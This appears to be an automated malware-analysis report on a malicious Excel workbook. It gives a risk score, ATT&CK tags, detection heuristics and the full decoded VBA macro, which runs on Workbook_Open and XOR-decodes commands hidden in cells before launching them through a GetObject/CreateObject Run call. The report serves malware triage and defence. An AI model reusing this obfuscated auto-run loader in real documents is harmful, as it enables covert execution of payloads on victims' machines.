MALICIOUS
148
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1203 Exploitation for Client Execution
The sample is an Excel file containing VBA macros, specifically a Workbook_Open macro. High-severity heuristics indicate the use of CreateObject and GetObject, common for executing malicious code. The VBA macro code, though partially obfuscated, appears to be designed to download and execute a second-stage payload, likely leveraging the CreateObject and GetObject functions for execution.
Heuristics 5
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
GetObject(Ottawa).CreateObject(Chapters).Run Fisting & " " & Noticed & AnimAted, 0 -
GetObject call high OLE_VBA_GETOBJGetObject callMatched line in script
GetObject(Ottawa).CreateObject(Chapters).Run Fisting & " " & Noticed & AnimAted, 0 -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECTriggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
Workbook_Open macro low OLE_VBA_WBOPENWorkbook_Open macroMatched line in script
Sub Workbook_Open()
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4310 bytes |
SHA-256: 7e5d52c65e1dce05cb378373130ac36532e010133055b847aecc0c8f81e5bdfd |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit
Private Function Mills(ByVal TorTure As String) As Variant
Dim Displaying As Long: Displaying = 0: Dim Genes() As Byte
Dim ExaminEd() As Byte, ExpEnditurE As String, Personalized As Integer, GanGbanG As Integer, Destruction As Integer
ExaminEd = "gc4263a9ce"
GoTo RemaRks
ExtEnsions:
If Displaying < UBound(Genes) Then
Personalized = Displaying Mod (10)
Destruction = ExaminEd(Personalized * 2)
GanGbanG = Genes(Displaying)
GoTo Mistake
Overnight:
ExpEnditurE = ExpEnditurE & Chr(Genes(Displaying))
Displaying = Displaying + 1
GoTo ExtEnsions
Else
GoTo DiviDeD
End If
DiviDeD:
Mills = ExpEnditurE
Exit Function
RemaRks:
Genes = Equation(TorTure)
GoTo ExtEnsions
Mistake:
Genes(Displaying) = Abs(GanGbanG Xor Destruction)
GoTo Overnight
End Function
Private Sub Florence(ByVal Ottawa As String, ByVal AnimAted As String, ByVal Fisting As String, ByVal Chapters As String, ByVal Noticed As String)
GetObject(Ottawa).CreateObject(Chapters).Run Fisting & " " & Noticed & AnimAted, 0
End Sub
Sub Workbook_Open()
Florence Mills(Sheets("l747f").Range("E150").Value), Mills(Sheets("l747f").Range("F186").Value), Mills(Sheets("l747f").Range("F124").Value), Mills(Sheets("l747f").Range("H114").Value), Mills(Sheets("l747f").Range("H162").Value)
End Sub
Private Function Equation(ByVal Introduce As String) As Variant
Dim ExpEnditurE() As Byte, i As Long, Personalized As Integer, Lycos As Integer
Lycos = Len(Introduce) / 2: i = 0: ReDim ExpEnditurE(0 To Lycos) As Byte
Destruction:
If i < Len(Introduce) Then
Personalized = Personalized + 1
ExpEnditurE(Personalized - 1) = Chr((7 * 2) + (((10 - 4) * 2) * 2)) & Chr((((16 / 2) * 2) + (4 * 5)) * 2) & Mid(Introduce, i + 1, 2)
i = i + 2
GoTo Destruction
Else
GoTo Victim
Dim Mistake As String
Mistake = InputBox("celp lape")
End If
Victim:
Equation = ExpEnditurE
End Function
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.